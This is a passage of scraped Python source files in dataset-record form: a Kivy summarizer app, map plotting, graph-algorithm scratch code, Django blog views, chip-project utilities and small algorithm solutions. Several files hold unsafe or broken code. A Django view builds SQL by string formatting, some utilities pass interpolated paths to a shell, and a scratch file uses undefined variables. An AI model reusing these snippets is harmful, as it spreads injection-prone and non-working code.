self.ids.fileSelectedtxt.text = filePath[0]\n except:\n self.ids.fileSelectedtxt.text = \"\"\n\n def selectedVideo(self, filePath):\n captions = VideoCaptions()\n captions.getChunkCaption(filePath)\n print(captions.WriteCaptionInFile())\n layout = self.manager.get_screen('textPage').layout\n layout.text = captions.WriteCaptionInFile()\n\n def selectedFile(self, ischeckboxActive, filePath, first_page, last_page):\n if ischeckboxActive == False:\n self.ids.fileSelectedtxt.text = filePath[0]\n first_page = self.ids.startPagePDFtext.text\n last_page = self.ids.endPagePDFtext.text\n layout = self.manager.get_screen('textPage').layout\n # print(\"test: \"+ReadingFromPDF(filename=filePath[0], f=1, l=4))\n docReader = ReadDocument()\n layout.text = docReader.ReadingFromPDF(filename=filePath[0], firstPage=first_page, lastPage=last_page)\n else:\n self.selectedVideo(filePath)\n\n\nclass UrlPage(Screen):\n def UserUrl(self, url):\n self.ids.urltxt.text = url\n layout = self.manager.get_screen('textPage').layout\n webScraper = webScraping()\n layout.text = webScraper.ReadFromWebSite(URL=url)\n\n pass\n\n\nclass PageManager(ScreenManager):\n pass\n\n\n######################################################\n\n# calling and building the design file (GUI)\n\n\nTheApp = Builder.load_file('summarizeEnterpriseGUI.kv')\n\n\n######################################################\n\n\n######################################################\nclass SummarizeEnterprise(App):\n\n def build(self):\n # setting the color of the background\n Window.clearcolor = (52 / 255.0, 73 / 255.0, 94 / 255.0, 1)\n return TheApp # sm\n\n\nif __name__ == '__main__':\n SummarizeEnterprise().run()","sub_path":"summarizeEnterprise.py","file_name":"summarizeEnterprise.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"359720824","text":"import json\nimport pandas as pd\nimport vincent\n\ncounty_data = r'data/us_county_data.csv'\ncounty_geo = r'data/us-counties.json'\nstate_geo = r'data/us-states.json'\nstate_unemployment = r'data/US_Unemployment_Oct2012.csv'\n\n#We want to map the county codes we have in our geometry to those in the\n#county_data file, which contains additional rows we don't need\nwith open(county_geo, 'r') as f:\n get_id = json.load(f)\n \ncounty_codes = [x['id'] for x in get_id['features']]\ncounty_df = pd.DataFrame({'FIPS_Code': county_codes}, dtype=str)\n\n#Read into Dataframe, cast to string for consistency\ndf = pd.read_csv(county_data, na_values=[' '])\ndf['FIPS_Code'] = df['FIPS_Code'].astype(str)\n\n#Perform an inner join, pad NA's with data from nearest county\nmerged = pd.merge(df, county_df, on='FIPS_Code', how='inner')\nmerged = merged.fillna(method='pad')\n\npath = 'vega.json'\n\n#Map different data sets\nvis = vincent.Map(width=1000, height=800)\nvis.tabular_data(merged, columns=['FIPS_Code', 'Unemployment_rate_2011']) \nvis.geo_data(projection='albersUsa', scale=1000, bind_data='data.id', counties=county_geo)\nvis += ([\"#f5f5f5\",\"#000045\"], 'scales', 0, 'range')\nvis.to_json(path, html=True)\n\nvis.tabular_data(merged, columns=['FIPS_Code', 'Median_Household_Income_2011'])\nvis.to_json(path)\n\nvis.tabular_data(merged, columns=['FIPS_Code', 'Civilian_labor_force_2011']) \nvis.to_json(path, html=True)\n\n#Swap county data for state data, reset map\nstate_data = pd.read_csv(state_unemployment)\nvis.tabular_data(state_data, columns=['State', 'Unemployment'])\nvis.geo_data(bind_data='data.id', reset=True, states=state_geo)\nvis.update_map(scale=1000, projection='albersUsa')\nvis += (['#c9cedb', '#0b0d11'], 'scales', 0, 'range')\nvis.to_json(path, html=True)\n","sub_path":"examples/vincent_choropleth.py","file_name":"vincent_choropleth.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470189603","text":"import brandes\n\nedges1 = [[0, 1], [1, 2], [1]]\nedges2 = [[0], [0, 1, 2], [1]]\nG = brandes.connectTree(edges1, edges2)\nprint(G.edges)\n\n\"\"\"\ndef connectTree(edges1, edges2):\n length = len(edges1)\n for u in range(length):\n for i in range(len(edges1[u])):\n edges1[u][i] += length\n edges1 += edges2\n return Graphs(edges1)\n\n\"\"\"\nT = [\"gfgfgf\"]\nT[0].lower()\n\n\ndef alternativeBrandes(self, start=0):\n self.constructBlocks()\n count = self.componentCount\n n = self.n\n AP_in_block = [[] for x in range(count)]\n for u in self.articulationPoints:\n for B in self.blockOfU[u]:\n AP_in_block[B].append(u)\n discovered = [False] * count\n discovered[start] = True\n discovered_vertex = [False] * n\n vertex_to_index = [-1] * n\n index_to_vertex = [-1] * n\n edges = [[] for x in range(n)]\n processed_block = [False] * count\n depth = 0\n vertices_processed = 0\n S = [(start, None)]\n while len(S) > 0:\n pair = S.pop()\n B = pair[0]\n u = pair[1]\n vertices_discovered = vertices_processed\n for u in self.blockContains[B]:\n vertex_to_index[u] = vertices_discovered\n index_to_vertex[vertices_discovered] = u\n discovered_vertex[u] = True\n vertices_discovered += 1\n for i in range(vertices_processed, vertices_discovered):\n u = index_to_vertex[i]\n if self.isArticulationPoint(u):\n for v in self.edges[u]:\n if self.isInBlock(v, B):\n j = vertex_to_index[v]\n edges[i].append(j)\n else:\n for v in self.edges[u]:\n j = vertex_to_index[v]\n edges[i].append(j)\n self.brandes_for_dfs(B, u, edges, vertices_processed)\n if u is not None:\n S = []\n P = [[] for x in range(n)]\n sigma = [0] * n\n sigma[s] = 1\n d = [-1] * n\n d[s] = 0\n Q = deque([s])\n while len(Q) > 0:\n i = Q.popleft()\n v = self.blockContains[B][i]\n S.append(i)\n for w in self.edges[v]:\n if self.isInBlock(w, B):\n j = self.findIndex(w, B)\n if d[j] < 0:\n Q.append(j)\n d[j] = d[i] + 1\n if d[j] == d[i] + 1: # v is a predecessor of w on a shortest path from s to w\n sigma[j] += sigma[i]\n P[j].append(i)\n delta = [0] * n\n if ap == None:\n while len(S) > 0:\n j = S.pop()\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n w = self.blockContains[B][j]\n self.bc[w] += delta[j]\n elif u == ap:\n while len(S) > 0:\n j = S.pop()\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n w = self.blockContains[B][j]\n self.bc[w] += vertices_processed * delta[j]\n else:\n while len(S) > 0:\n j = S.pop()\n w = self.blockContains[B][j]\n if w == ap:\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (vertices_processed + delta[j])\n if j != s:\n self.bc[w] += delta[j]\n else:\n for i in P[j]:\n delta[i] += (sigma[i] / sigma[j]) * (1 + delta[j])\n if j != s:\n self.bc[w] += delta[j]\n\n \"\"\"\n def computeTrafficMatrix(self, B):\n length = len(self.blockContains[B])\n h = [[1] * length for x in range(length)]\n for i in range(length):\n for j in range(i):\n u = self.blockContains[B][i]\n v = self.blockContains[B][j]\n if self.isArticulationPoint(u):\n if self.isArticulationPoint(v):\n h[i][j] = (self.n - self.D_B[(B, u)]) * (self.n - self.D_B[(B, v)])\n else:\n h[i][j] = self.n - self.D_B[(B, u)]\n else:\n if self.isArticulationPoint(v):\n h[i][j] = self.n - self.D_B[(B, v)]\n h[j][i] = h[i][j]\n h[i][i] = 0\n return h\n \"\"\"\n\n\n\n\"\"\"\nn = self.n\ncounter = n\nself.dfs(start, True)\nhighest = self.d.copy()\ndToVertex = [0] * n # Avoids O(n) searches later\nfor u in range(n):\n dToVertex[self.d[u]] = u\nwhile counter > 0:\n counter -= 1\n u = dToVertex[counter]\n for v in self.edges[u]:\n if v == self.pi[u]: # v is parent in dfs tree\n pass\n elif self.d[v] < self.d[u]: # backedge\n if self.d[v] < highest[u]:\n highest[u] = self.d[v]\n else: # child\n if highest[v] < highest[u]:\n highest[u] = highest[v]\nu = dToVertex[0]\nchildren = 0\nfor v in self.edges[u]:\n if u == self.pi[v]:\n children += 1\nif children > 1:\n self.articulationPoints.append(u)\n self.blockOfU[u] = []\nelse:\n self.addComponent(u)\nfor i in range(1, n):\n u = dToVertex[i]\n for v in self.edges[u]:\n if u == self.pi[v]: # v is a child of u\n if highest[v] >= i: # This means u is an articulation point\n if not self.isArticulationPoint(u):\n # This means it's the first time it's determined that u is an articulation point\n self.blockOfU[u] = []\n self.articulationPoints.append(u)\n\"\"\"\n","sub_path":"klad.py","file_name":"klad.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15682105","text":"# naive O(n), TLE\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n if len(citations) == 0:\n return 0\n count = 1\n for i in range(len(citations) - 1, -1, -1):\n if citations[i] >= count:\n if i > 0:\n count += 1\n else:\n count -= 1\n break\n return count\n\n# binary search: O(logn)\nclass Solution(object):\n def hIndex(self, citations):\n \"\"\"\n :type citations: List[int]\n :rtype: int\n \"\"\"\n n = len(citations)\n low = 0\n high = n - 1\n while low <= high:\n mid = low + (high - low)/2\n if n - mid > citations[mid]:\n low = mid + 1\n else:\n high = mid - 1\n return n - low\n","sub_path":"search/h_index_ii.py","file_name":"h_index_ii.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236426625","text":"#!/usr/bin/env python\nu\"\"\"\nread_shapefile.py\nWritten by Tyler Sutterley (09/2019)\nReads polygons from ESRI shapefiles\n\nINPUTS:\n input shapefile (.shp)\n\nOUTPUT:\n shapely multipolygon object of input file\n\nOPTIONS:\n EPSG: projection identifier for output coordinates\n ZIP: input file is compressed\n VARIABLES: reduce to a specific set of identifiers\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n https://numpy.org/doc/stable/user/numpy-for-matlab-users.html\n fiona: Python wrapper for vector data access functions from the OGR library\n https://fiona.readthedocs.io/en/latest/manual.html\n shapely: PostGIS-ish operations outside a database context for Python\n http://toblerity.org/shapely/index.html\n pyproj: Python interface to PROJ library\n https://pypi.org/project/pyproj/\n\nUPDATE HISTORY:\n Updated 09/2019: made output coordinate system an option (EPSG)\n Updated 07/2019: added option to reduce to specific VARIABLES within file\n Updated 06/2019: using fiona for consistency between read functions\n convert projection to EPSG:4326 before creating polygons\n Written 06/2019\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport fiona\nimport numpy as np\nimport pyproj\nfrom shapely.geometry import Polygon, MultiPolygon\n\n#-- PURPOSE: read shapefiles\ndef read_shapefile(input_file, EPSG=4326, ZIP=False, VARIABLES=None):\n #-- read input zipfile containing shapefiles\n if ZIP:\n #-- read the compressed shapefile and extract entities\n shape = fiona.open('zip://{0}'.format(os.path.expanduser(input_file)))\n else:\n #-- read the shapefile and extract entities\n shape = fiona.open(os.path.expanduser(input_file),'r')\n\n #-- convert projection to EPSG\n proj1 = pyproj.Proj(\"+init={0}\".format(shape.crs['init']))\n proj2 = pyproj.Proj(\"+init=EPSG:{0:d}\".format(EPSG))\n\n #-- find features of interest\n geometries = ('LineString','Polygon')\n f = [f for f in shape.values() if f['geometry']['type'] in geometries]\n #-- reduce to variables of interest if specified\n f = [ft for ft in f if ft['id'] in VARIABLES] if VARIABLES else f\n\n #-- list of polygons\n poly_list = []\n #-- for each entity\n for i,ent in enumerate(f):\n #-- extract coordinates for entity\n for coords in ent['geometry']['coordinates']:\n #-- convert points to latitude/longitude\n x,y = np.transpose(coords)\n lon,lat = pyproj.transform(proj1, proj2, x, y)\n #-- create shapely polygon\n poly_obj = Polygon(list(zip(lon, lat)))\n #-- Valid Polygon cannot have overlapping exterior or interior rings\n if (not poly_obj.is_valid):\n poly_obj = poly_obj.buffer(0)\n poly_list.append(poly_obj)\n #-- create shapely multipolygon object\n mpoly_obj = MultiPolygon(poly_list)\n #-- return the polygon object\n return mpoly_obj\n","sub_path":"cryosat_toolkit/read_shapefile.py","file_name":"read_shapefile.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643849556","text":"# SPDX-FileCopyrightText: 2020 Efabless Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# SPDX-License-Identifier: Apache-2.0\n\nimport gzip\nimport hashlib\nimport logging\nimport os\nimport shutil\nimport subprocess\nfrom pathlib import Path\n\nimport requests\nimport yaml\n\n\ndef download_gzip_file_from_url(target_url, download_path):\n with open(download_path, 'wb') as f:\n status_code = None\n while status_code != 200:\n logging.info(f\"Trying to get file {target_url}\")\n response = requests.get(target_url, headers={'accept-encoding': 'gzip'}, stream=True)\n status_code = response.status_code\n logging.info(f\"Got file {target_url}\")\n gzip_file = gzip.GzipFile(fileobj=response.raw)\n shutil.copyfileobj(gzip_file, f)\n\n\ndef compress_gds(gds_path):\n cmd = f\"cd {gds_path}; make compress;\"\n try:\n logging.info(f\"{{{{COMPRESSING GDS}}}} Compressing GDS files in {gds_path}\")\n subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n except subprocess.CalledProcessError as error:\n logging.info(f\"{{{{COMPRESSING GDS ERROR}}}} Make 'compress' Error: {error}\")\n raise SystemExit(252)\n\n\ndef uncompress_gds(gds_path):\n cmd = f\"cd {gds_path}; make uncompress;\"\n try:\n logging.info(f\"{{{{EXTRACTING GDS}}}} Extracting GDS files in: {gds_path}\")\n subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n except subprocess.CalledProcessError as error:\n logging.info(f\"{{{{EXTRACTING GDS ERROR}}}} Make 'uncompress' Error: {error}\")\n raise SystemExit(252)\n\n\ndef is_binary_file(filename):\n file_extensions = Path(filename).suffix\n return 'gds' in file_extensions or 'gz' in file_extensions\n\n\ndef is_not_binary_file(filename):\n return not is_binary_file(filename)\n\n\ndef file_hash(filename):\n def is_compressed(filename):\n with open(filename, 'rb') as f:\n return f.read(2) == b'\\x1f\\x8b'\n\n sha1 = hashlib.sha1()\n BSIZE = 65536\n\n if is_compressed(filename):\n f = gzip.open(filename, 'rb')\n else:\n f = open(filename, 'rb')\n while True:\n data = f.read(BSIZE)\n if not data:\n break\n sha1.update(data)\n f.close()\n return sha1.hexdigest()\n\n\ndef get_project_config(project_path):\n project_config = {}\n try:\n yaml_path = project_path / 'info.yaml'\n project = yaml.load(open(yaml_path, encoding='utf-8'), Loader=yaml.FullLoader).get('project')\n except FileNotFoundError:\n logging.error(f\"{{{{YAML NOT FOUND ERROR}}}} Required YAML file 'info.yaml' was not found in path: {project_path}\")\n raise SystemExit(254)\n\n if project:\n if not project.get('top_level_netlist'):\n logging.fatal(\"{{TOP LEVEL NETLIST NOT FOUND}} 'top_level_netlist' wast not found in project 'info.yaml'\")\n if not project.get('user_level_netlist'):\n logging.fatal(\"{{USER LEVEL NETLIST NOT FOUND}} 'user_level_netlist' wast not found in project 'info.yaml'\")\n else:\n logging.fatal(\"{{PROJECT YAML MALFORMED}} Project 'info.yaml' is structured incorrectly\")\n\n if not project or not project.get('top_level_netlist') or not project.get('user_level_netlist'):\n raise SystemExit(254)\n\n # note: get netlists\n project_config['top_netlist'] = project_path / project['top_level_netlist']\n project_config['user_netlist'] = project_path / project['user_level_netlist']\n\n # note: parse netlists\n top_level_netlist_extension = os.path.splitext(project_config['top_netlist'])[1]\n user_level_netlist_extension = os.path.splitext(project_config['user_netlist'])[1]\n\n if top_level_netlist_extension == '.v' and user_level_netlist_extension == '.v':\n project_config['netlist_type'] = 'verilog'\n elif top_level_netlist_extension == '.spice' and user_level_netlist_extension == '.spice':\n project_config['netlist_type'] = 'spice'\n else:\n logging.fatal(\"{{PARSING NETLISTS FAILED}} The provided top and user level netlists are neither '.spice' or '.v' files. Please adhere to the required input types.\")\n raise SystemExit(254)\n\n # note: get project type and set remaining config\n project_config['link_prefix'] = \"https://raw.githubusercontent.com/efabless/caravel/master\"\n is_caravan = any(netlist in str(project_config['top_netlist']) for netlist in [f'caravan.{ext}' for ext in ['v', 'spice']])\n is_caravel = any(netlist in str(project_config['top_netlist']) for netlist in [f'caravel.{ext}' for ext in ['v', 'spice']])\n is_analog_wrapper = any(netlist in str(project_config['user_netlist']) for netlist in [f'user_analog_project_wrapper.{ext}' for ext in ['v', 'spice']])\n is_digital_wrapper = any(netlist in str(project_config['user_netlist']) for netlist in [f'user_project_wrapper.{ext}' for ext in ['v', 'spice']])\n if is_caravan and is_analog_wrapper:\n project_config['type'] = 'analog'\n project_config['top_module'] = 'caravan'\n project_config['user_module'] = 'user_analog_project_wrapper'\n project_config['golden_wrapper'] = 'user_analog_project_wrapper_empty'\n elif is_caravel and is_digital_wrapper:\n project_config['type'] = 'digital'\n project_config['top_module'] = 'caravel'\n project_config['user_module'] = 'user_project_wrapper'\n project_config['golden_wrapper'] = 'user_project_wrapper_empty'\n else:\n logging.fatal(\"{{IDENTIFYING PROJECT TYPE FAILED}} The provided top level and user level netlists are not correct.\\n\"\n \"The top level netlist should point to 'caravel.(v/spice)' if your project is digital or 'caravan.(v/spice)' if your project is analog.\\n\"\n \"The user level netlist should point to 'user_project_wrapper.(v/spice)' if your project is digital or 'user_analog_project_wrapper.(v/spice)' if your project is analog.\")\n raise SystemExit(254)\n return project_config\n","sub_path":"checks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"541332977","text":"#-*-coding: utf-8-*-\n\n# Version: 0.1\n# Author: Don Li \n# License: Copyright(c) 2015 Don.Li\n# Summary:\n\nimport sys, os\nfrom os.path import abspath, dirname, join, pardir, pathsep\n\ndef run_with_source():\n _argv = sys.argv\n return ((len(_argv) > 0) and (_argv[0].rfind('.py') >= 0))\n\n\n_ROOTPATH_CACHED = None\ndef root_path():\n global _ROOTPATH_CACHED\n\n if not _ROOTPATH_CACHED:\n _curr_path = dirname(__file__)\n\n if run_with_source():\n _relpath = ''.join((_curr_path, '/', pardir, '/', pardir))\n else:\n _relpath = ''.join((_curr_path.rsplit('/', 1)[0], '/', pardir))\n\n _ROOTPATH_CACHED = abspath(_relpath) + '/'\n\n #print(_curr_path, _relpath, _ROOTPATH_CACHED)\n\n return _ROOTPATH_CACHED\n\ndef default_config_path():\n return root_path() + 'etc/gemini.conf'\n\n","sub_path":"src/lib/osutil.py","file_name":"osutil.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281399040","text":"from django.shortcuts import render\r\nfrom blog2 import models\r\nfrom django.utils import timezone\r\nimport markdown\r\n# Create your views here.\r\n\r\n\r\ndef index(request):\r\n\r\n singles = models.ExampleModel.objects.all()\r\n return render(request, 'blog2/index.html', {'singles': singles, })\r\n\r\n\r\ndef single_page(request, single_id):\r\n\r\n\r\n data = {} # data用于向模板传递数据\r\n single = models.ExampleModel.objects.get(pk=single_id) # 获取正被打开的博客\r\n data['single'] = single\r\n\r\n next_blog = models.ExampleModel.objects.filter(id__gt=single.id).order_by('id')\r\n pre_blog = models.ExampleModel.objects.filter(id__lt=single.id).order_by('-id')\r\n\r\n # 取第1条记录\r\n if pre_blog.count() > 0:\r\n pre_blog = pre_blog[0]\r\n else:\r\n pre_blog = None\r\n\r\n if next_blog.count() > 0:\r\n next_blog = next_blog[0]\r\n else:\r\n next_blog = None\r\n\r\n\r\n single.content = markdown.markdown(single.content, extensions=[\r\n 'markdown.extensions.extra',\r\n 'markdown.extensions.codehilite',\r\n 'markdown.extensions.toc',\r\n ])\r\n\r\n data['pre_blog'] = pre_blog\r\n data['next_blog'] = next_blog\r\n\r\n return render(request, 'blog2/single.html', data, )\r\n\r\n\r\ndef pre_page(request):\r\n # previous blog(上一篇)\r\n sql = \"select id from blog2_examplemodel where id>%s order by id limit 1\" % (id)\r\n single_ids = models.ExampleModel.objects.raw(sql)\r\n if len(list(single_ids)) > 0:\r\n single_id = single_ids[0]\r\n else:\r\n single_id = None\r\n\r\n single = models.ExampleModel.objects.get(pk=single_id)\r\n\r\n single.content = markdown.markdown(single.content, extensions=[\r\n 'markdown.extensions.extra',\r\n 'markdown.extensions.codehilite',\r\n 'markdown.extensions.toc',\r\n ])\r\n\r\n return render(request, 'blog2/single.html', {'single': single}, )\r\n\r\n","sub_path":"blog2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"248024982","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import HttpResponse\nimport main.models as models\nimport json\n\n__author__ = 'murad'\n\n\nclass Authors():\n def __init__(self):\n pass\n\n @staticmethod\n def read(request):\n # \"\"\"\n # вывод списка авторов\n # \"\"\"\n # authors = list(\n # models.Authors.objects\n # .filter(user=request.user.id)\n # .values(\"author_id\",\n # \"name\", \"surname\", \"patronymic\",\n # \"mail\", \"tel\", \"post\",\n # \"department\", \"department__name\")\n # )\n # for author in authors:\n # author[\"department\"] = {\n # \"department_id\": author.pop(\"department\") if author[\"department\"] else \"\",\n # \"name\": author.pop(\"department__name\") if author[\"department__name\"] else \"\"\n # }\n # if authors:\n # return HttpResponse(json.dumps(authors), content_type=\"application/json\")\n # else:\n # return HttpResponse(json.dumps(\"\"), content_type=\"application/json\")\n \"\"\"\n вывод списка авторов\n \"\"\"\n authors = list(\n models.Authors.objects\n .filter(user=request.user.id, is_active=True)\n )\n items = list()\n for author in authors: # FIXME: do refactor here\n item = {\n \"author_id\": author.author_id,\n \"name\": author.name,\n \"surname\": author.surname,\n \"patronymic\": author.patronymic,\n \"full_name\": str(author),\n \"department\": {\n \"department_id\": author.department.department_id if author.department else \"\",\n \"name\": author.department.name if author.department else \"\"\n },\n \"mail\": author.mail,\n \"tel\": author.tel,\n \"post\": author.post,\n }\n items.append(item)\n if items:\n return HttpResponse(json.dumps(items), content_type=\"application/json\")\n else:\n return HttpResponse(json.dumps(\"\"), content_type=\"application/json\")\n\n @staticmethod\n def destroy(request):\n \"\"\"\n удаление автора\n \"\"\"\n item = json.loads(request.POST.get(\"item\"))\n author = models.Authors.objects.get(author_id=int(item[\"author_id\"]))\n author.is_active = False\n author.save()\n return HttpResponse(json.dumps({}), content_type=\"application/json\")\n\n @staticmethod\n def create(request):\n \"\"\"\n добавление автора\n \"\"\"\n item = json.loads(request.POST.get(\"item\"))\n try:\n department = models.Department.objects.get(department_id=int(item[\"department\"]))\n except:\n department = None\n new_author = models.Authors.objects.create(\n name=item[\"name\"],\n surname=item[\"surname\"],\n is_active=True,\n patronymic=item[\"patronymic\"],\n tel=item[\"tel\"],\n mail=item[\"mail\"],\n post=item[\"post\"],\n department=department,\n user=request.user)\n return HttpResponse(json.dumps({\"author_id\": new_author.author_id,\n \"name\": new_author.name,\n \"surname\": new_author.surname,\n \"patronymic\": new_author.patronymic,\n \"full_name\": str(new_author),\n \"tel\": new_author.tel,\n \"mail\": new_author.mail,\n \"post\": new_author.post,\n \"department\": {\"department_id\": department.department_id if department else \"\",\n \"name\": department.name if department else \"\"}}),\n content_type=\"application/json\")\n\n @staticmethod\n def update(request):\n \"\"\"\n редактирование автора\n \"\"\"\n item = json.loads(request.POST.get(\"item\"))\n author = models.Authors.objects.get(author_id=int(item[\"author_id\"]))\n try:\n department = models.Department.objects.get(department_id=item[\"department\"])\n except:\n department = None\n author.name = item[\"name\"]\n author.surname = item[\"surname\"]\n author.patronymic = item[\"patronymic\"]\n author.tel = item[\"tel\"]\n author.mail = item[\"mail\"]\n author.post = item[\"post\"]\n author.department = department\n author.save()\n return HttpResponse(json.dumps({\"author_id\": author.author_id,\n \"name\": author.name,\n \"surname\": author.surname,\n \"patronymic\": author.patronymic,\n \"full_name\": str(author),\n \"tel\": author.tel,\n \"mail\": author.mail,\n \"post\": author.post,\n \"department\": {\n \"department_id\": department.department_id if department else \"\",\n \"name\": department.name if department else \"\"}}),\n content_type=\"application/json\")","sub_path":"main/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244690473","text":"\"\"\"\nthis file is from Azhar\n\"\"\"\n\nclass Node(object):\n def __init__(self, info):\n self.info = info\n self.left = None\n self.right = None\n\n\ndef is_pure(node):\n return node.info > 7\n\n\ndef build_recurse_tree(node):\n if is_pure(node):\n print('node is pure')\n else:\n # meta, node.left, node.right = computeOptimalSplit(node)\n node.left = build_recurse_tree(Node(2 * node.info))\n node.right = build_recurse_tree(Node(2 * node.info + 1))\n return node\n\ndef inorderTraverse(node):\n print(node.info)\n# print(node.left)\n if node.left!=None:\n inorderTraverse(node.left)\n if node.right!=None:\n inorderTraverse(node.right)\n\nroot = Node(1)\nroot = build_recurse_tree(root)\ninorderTraverse(root)\n\n\n\n\n","sub_path":"codes/build_tree.py","file_name":"build_tree.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497703340","text":"from pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom typing import List\n\n\nclass SubWordAlignment(BertTokenizer):\n def __init__(self, vocab_file, do_lower_case=True, max_len=None,\n never_split=(\"[UNK]\", \"[SEP]\", \"[PAD]\", \"[CLS]\", \"[MASK]\")):\n super(SubWordAlignment, self).__init__(vocab_file, do_lower_case, max_len, never_split)\n\n def alignment(self, tokens: List[str], subwords: List[str]):\n tokenized_tokens = [[tokenized_tokens for tokenized_tokens in self.basic_tokenizer.tokenize(token)]\n for token in tokens]\n assert len(tokenized_tokens) == len(tokens)\n\n idx = 0\n indices = []\n for chunk in tokenized_tokens:\n buffer = []\n for token in chunk:\n for sub_token in self.wordpiece_tokenizer.tokenize(token):\n buffer.append(idx)\n assert sub_token == subwords[idx]\n idx += 1\n indices.append(buffer)\n\n assert len(subwords) == idx\n assert len(tokens) == len(indices)\n\n return indices\n","sub_path":"BERT/my_functions/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"233917468","text":"import platform\n\nclass MyPlatform:\n def __init__(self):\n system = platform.system().lower()\n dist = platform.dist()\n if system == 'windows': # Windows\n self.path = 'D:/Projects'\n elif system == 'darwin': # Mac OSX\n self.path = '/Users/Nelson/Projects'\n elif system == 'linux':\n if dist[1] == '14.04': # PythonAnywhere Linux\n self.path = '/home/nelson137/Projects'\n elif dist[1] == '16.04': # Ubuntu-Desktop Linux\n self.path = '/home/limbo/Projects'\n else:\n sel.path = 'Unknown System'\n else:\n self.path = 'Unknown System'\n","sub_path":"myplatform/myplatform/MyPlatform.py","file_name":"MyPlatform.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44628893","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.right = None\n self.left = None\n\nclass Solution:\n def __init__(self):\n self.res = float('inf')\n self.pre = -float('inf')\n\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n inorder traversal\n \"\"\"\n if root:\n self.getMinimumDifference(root.left)\n if root.val:\n self.res = min(self.res, root.val - self.pre)\n self.pre = root.val\n self.getMinimumDifference(root.right)\n return self.res\n \n\nif __name__ == \"__main__\":\n root = TreeNode(0)\n root.left = TreeNode(None)\n root.right = TreeNode(2236)\n root.right.left = TreeNode(1277)\n root.right.left.left = TreeNode(519)\n root.right.right = TreeNode(2776)\n sol = Solution()\n res = sol.getMinimumDifference(root)\n print(res)","sub_path":"BST/MinAbsDiffinBST.py","file_name":"MinAbsDiffinBST.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131737140","text":"import argparse\nimport os, errno\nimport random\nimport string\nimport math\nimport uuid\nimport shutil\n\nfrom fontTools.ttLib import TTFont\n\n\nimport matplotlib.pyplot as plt \nimport matplotlib.font_manager as mfm\n\nimport file_parser\n\nfrom tqdm import tqdm\nfrom string_generator import (\n create_strings_from_dict,\n create_strings_from_file,\n create_strings_from_wikipedia,\n create_strings_randomly\n)\nfrom data_generator import FakeTextDataGenerator\nfrom multiprocessing import Pool\n\ndef margins(margin):\n margins = margin.split(',')\n if len(margins) == 1:\n return [margins[0]] * 4\n return [int(m) for m in margins]\n\ndef parse_arguments():\n \"\"\"\n Parse the command line arguments of the program.\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Generate synthetic text data for text recognition.')\n parser.add_argument(\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"out/\",\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\"\n )\n parser.add_argument(\n \"-l\",\n \"--language\",\n type=str,\n nargs=\"?\",\n help=\"The language to use, should be fr (French), en (English), es (Spanish), de (German), hist (for historic fonts) or cn (Chinese).\",\n default=\"hist\"\n )\n parser.add_argument(\n \"-c\",\n \"--count\",\n type=int,\n nargs=\"?\",\n help=\"The number of images to be created.\",\n default=100\n )\n parser.add_argument(\n \"-rs\",\n \"--random_sequences\",\n action=\"store_true\",\n help=\"Use random sequences as the source text 